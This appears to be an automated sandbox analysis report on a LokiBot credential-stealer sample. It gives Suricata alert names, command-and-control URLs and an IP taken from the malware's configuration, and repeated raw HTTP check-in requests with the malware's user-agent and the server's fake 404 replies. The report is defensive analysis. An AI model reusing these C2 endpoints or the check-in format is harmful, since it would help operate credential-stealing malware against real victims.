Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50004 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49889 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49889 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49889 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49958
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50004 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50004 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49889 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49889 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:50004
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49938 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49938 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49928
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49952 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49952 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49952 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:50009
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49938 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49750
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49938 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49938 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49889
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49938
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49990 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49990
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49952 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49952 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50012 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50012 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50012 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49952
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50012 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50012 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:50012

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: 94.156.177.41/simple/five/fre.php

Source: Joe Sandbox View

IP Address: 94.156.177.41 94.156.177.41

Source: Joe Sandbox View

ASN Name: NET1-ASBG NET1-ASBG

Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 192Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 192Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41

Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe

Code function: 20_2_00404ED4 recv,

20_2_00404ED4

Source: unknown

HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 192Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
